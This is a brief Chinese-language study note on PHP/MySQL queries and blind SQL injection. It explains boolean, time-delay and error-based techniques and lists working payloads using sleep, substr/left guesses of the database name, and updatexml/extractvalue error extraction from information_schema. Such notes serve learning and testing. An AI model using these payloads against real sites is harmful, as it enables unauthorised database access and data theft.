#PHP-MYSQL-SQL 操作 - 增删改查
1 、功能:数据查询(对数据感兴趣)
查询: SELECT * FROM news where id=$id
2 、功能:新增用户,添加新闻等(对操作的结果感兴趣)
增加: INSERT INTO news ( 字段名 ) VALUES ( 数据 )
3 、功能:删除用户,删除新闻等
删除: DELETE FROM news WHERE id=$id
4 、功能:修改用户,修改文章等
修改: UPDATE news SET id=$id
#PHP-MYSQL- 注入函数 - 布尔 & 报错 & 延迟
盲注就是在注入过程中,获取的数据不能回显至前端页面。
我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。
解决:常规的联合查询注入不行的情况
我们可以知道盲注分为以下三类:
1 、基于布尔的 SQL 盲注 - 逻辑判断
regexp,like,ascii,left,ord,mid
2 、基于时间的 SQL 盲注 - 延时判断
if,sleep
3 、基于报错的 SQL 盲注 - 报错回显
floor , updatexml , extractvalue
延迟:(不需要有回显和报错)
and sleep(1);
and if(1>2,sleep(1),0);
and if(1<2,sleep(1),0);
布尔:(需要有回显 不需要报错)
and length(database())=7;
and left(database(),1)='p';
and left(database(),2)='pi';
and substr(database(),1,1)='p';
and substr(database(),2,1)='i';
and ord(left(database(),1))=112;
报错:(需要有报错 不需要有回显)
and updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)
and extractvalue(1, concat(0x5c, (select table_name from
information_schema.tables limit 1)));
更多: https://www.jianshu.com/p/bc35f8dd4f7c
